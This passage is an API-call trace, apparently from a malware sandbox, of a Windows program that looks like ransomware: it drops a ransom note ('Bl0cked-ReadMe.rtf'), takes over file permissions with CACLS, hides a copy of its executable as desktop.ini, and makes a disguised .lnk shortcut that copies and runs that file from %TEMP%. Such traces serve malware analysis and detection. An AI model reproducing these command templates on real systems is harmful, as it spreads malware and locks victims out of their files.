szExeFile="conhost.exe")) returned 1 [0113.400] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0113.401] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd44, pcPriClassBase=8, dwFlags=0x0, szExeFile="GYm4NxCU.exe")) returned 1 [0113.403] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd80, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0113.404] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0xd68, pcPriClassBase=8, dwFlags=0x0, szExeFile="hvGO9ckx.exe")) returned 1 [0113.405] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd68, pcPriClassBase=8, dwFlags=0x0, szExeFile="hvGO9ckx.exe")) returned 0 [0113.406] CloseHandle (hObject=0xf8) returned 1 [0113.406] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0xf8 [0113.406] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0113.406] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0113.406] CryptAcquireContextW (in: phProv=0x12ec4c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x12ec4c*=0x1c95c8) returned 1 [0114.969] CryptGenRandom (in: hProv=0x1c95c8, dwLen=0x28, pbBuffer=0x12ec60 | out: pbBuffer=0x12ec60) returned 1 [0114.969] CryptReleaseContext (hProv=0x1c95c8, dwFlags=0x0) returned 1 [0114.969] ReleaseMutex (hMutex=0xf8) returned 1 [0114.969] ReleaseMutex (hMutex=0xf8) returned 1 [0114.969] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0114.969] ReleaseMutex (hMutex=0xf8) returned 1 [0114.969] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0114.969] ReleaseMutex (hMutex=0xf8) returned 1 [0114.969] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0114.969] ReleaseMutex (hMutex=0xf8) returned 1 [0114.969] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.969] GetFullPathNameW (in: lpFileName="C:\\Users\\All 
Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x12eab4*="RacWmiDatabase.sdf") returned 0x41 [0114.969] GetLastError () returned 0x20 [0114.969] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\xacf8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x51 [0115.200] LocalFree (hMem=0x1cacf8) returned 0x0 [0115.200] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0115.200] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0115.200] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0115.200] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0115.200] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0115.200] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0115.200] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, 
dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"", lpProcessInformation=0x12fba4*(hProcess=0xfc, hThread=0xf4, dwProcessId=0xdfc, dwThreadId=0xe00)) returned 1 [0115.338] WaitForSingleObject (hHandle=0xfc, dwMilliseconds=0xffffffff) returned 0x0 [0119.248] CloseHandle (hObject=0xfc) returned 1 [0119.248] CloseHandle (hObject=0xf4) returned 1 [0119.248] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0119.248] ReleaseMutex (hMutex=0xf8) returned 1 [0119.248] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0119.248] ReleaseMutex (hMutex=0xf8) returned 1 [0119.249] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0119.249] ReleaseMutex (hMutex=0xf8) returned 1 [0119.249] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0119.249] ReleaseMutex (hMutex=0xf8) returned 1 [0119.249] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.249] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpFilePart=0x12eab4*="RacWmiDatabase.sdf") 
returned 0x41 [0119.249] GetLastError () returned 0x20 [0119.249] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\xacf8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x51 [0119.249] LocalFree (hMem=0x1cacf8) returned 0x0 [0119.249] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0119.249] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0119.250] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0119.250] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0119.250] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\PUBLISHEDDATA\\") returned 0x2f [0119.250] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\PUBLISHEDDATA\\", cchCount1=47, lpString2="", cchCount2=0) returned 3 [0119.250] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\PUBLISHEDDATA\\") returned 0x2f [0119.250] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0119.250] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\PUBLISHEDDATA\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0119.250] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x14a8b5c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") 
returned 0x2d [0119.250] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0119.251] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0119.251] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\", lpszShortPath=0x14a8b5c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\") returned 0x28 [0119.251] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0119.251] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0119.251] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0xfc, hThread=0xf4, dwProcessId=0xf34, dwThreadId=0xf38)) returned 1 [0119.285] CloseHandle (hObject=0xfc) returned 1 [0119.285] CloseHandle (hObject=0xf4) returned 1 [0119.285] GetFileAttributesW (lpFileName="C:\\Users\\All 
Users\\Microsoft\\RAC\\PublishedData\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\bl0cked-readme.rtf")) returned 0xffffffff [0119.285] GetLastError () returned 0x2 [0119.286] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0119.303] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\bl0cked-readme.rtf")) returned 0x2020 [0119.303] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0119.303] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1c95c8 [0119.303] FindClose (in: hFindFile=0x1c95c8 | out: hFindFile=0x1c95c8) returned 1 [0119.303] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0119.303] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x14a8b5c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0119.303] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0119.303] CharUpperBuffW (in: lpsz="[FROM_PATH]", 
cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0119.303] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\") returned 0x28 [0119.304] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0119.304] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0119.304] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData", lpszShortPath=0x14a8b5c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1") returned 0x27 [0119.305] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x15a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x15a [0119.305] CharUpperBuffW (in: lpsz="[TO_DIR]", 
cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0119.305] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"", lpProcessInformation=0x12fb78*(hProcess=0xf4, hThread=0xfc, dwProcessId=0xf3c, dwThreadId=0xf40)) returned 1 [0119.306] WaitForSingleObject (hHandle=0xf4, dwMilliseconds=0xffffffff) returned 0x0 [0120.222] CloseHandle (hObject=0xf4) returned 1 [0120.222] CloseHandle (hObject=0xfc) returned 1 [0120.222] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0120.222] FindFirstFileW (in: 
lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1c95c8 [0120.222] FindClose (in: hFindFile=0x1c95c8 | out: hFindFile=0x1c95c8) returned 1 [0120.222] GetTickCount () returned 0x28796 [0120.222] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=17701124563) returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0120.222] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0120.222] 
CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0120.222] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0120.222] CharUpperBuffW (in: lpsz="explorer.exe \"PublishedData\" & type \"PublishedData\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6b | out: lpsz="EXPLORER.EXE \"PUBLISHEDDATA\" & TYPE \"PUBLISHEDDATA\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6b [0120.222] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0120.223] CharUpperBuffW (in: lpsz="explorer.exe \"PublishedData\" & type \"PublishedData\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6c | out: lpsz="EXPLORER.EXE \"PUBLISHEDDATA\" & TYPE \"PUBLISHEDDATA\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6c [0120.223] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0120.223] CoInitialize (pvReserved=0x0) returned 0x0 [0120.966] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d2a78) returned 0x0 [0121.300] ShellLink:IUnknown:QueryInterface (in: This=0x1d2a78, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d2a50) returned 0x0 [0121.301] 
ShellLink:IUnknown:QueryInterface (in: This=0x1d2a78, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d2a5c) returned 0x0 [0121.301] ShellLink:IShellLinkW:SetPath (This=0x1d2a50, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0126.439] ShellLink:IShellLinkW:SetArguments (This=0x1d2a50, pszArgs="/C explorer.exe \"PublishedData\" & type \"PublishedData\\desktop.ini\" > \"%TEMP%\\Cexohzo3.exe\" && \"%TEMP%\\Cexohzo3.exe\"") returned 0x0 [0126.440] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d2a50, pszDir="%CD%") returned 0x0 [0126.440] ShellLink:IShellLinkW:SetIconLocation (This=0x1d2a50, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0126.440] ShellLink:IShellLinkW:SetShowCmd (This=0x1d2a50, iShowCmd=7) returned 0x0 [0126.440] ShellLink:IPersistFile:Save (This=0x1d2a5c, pszFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData.lnk", fRemember=0) returned 0x0 [0126.470] ShellLink:IUnknown:Release (This=0x1d2a5c) returned 0x2 [0126.470] ShellLink:IUnknown:Release (This=0x1d2a50) returned 0x1 [0126.470] ShellLink:IUnknown:Release (This=0x1d2a78) returned 0x0 [0126.470] CoUninitialize () [0126.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.471] ReleaseMutex (hMutex=0xf8) returned 1 [0126.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.471] ReleaseMutex (hMutex=0xf8) returned 1 [0126.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.471] ReleaseMutex (hMutex=0xf8) returned 1 [0126.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.471] ReleaseMutex (hMutex=0xf8) returned 1 [0126.471] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all 
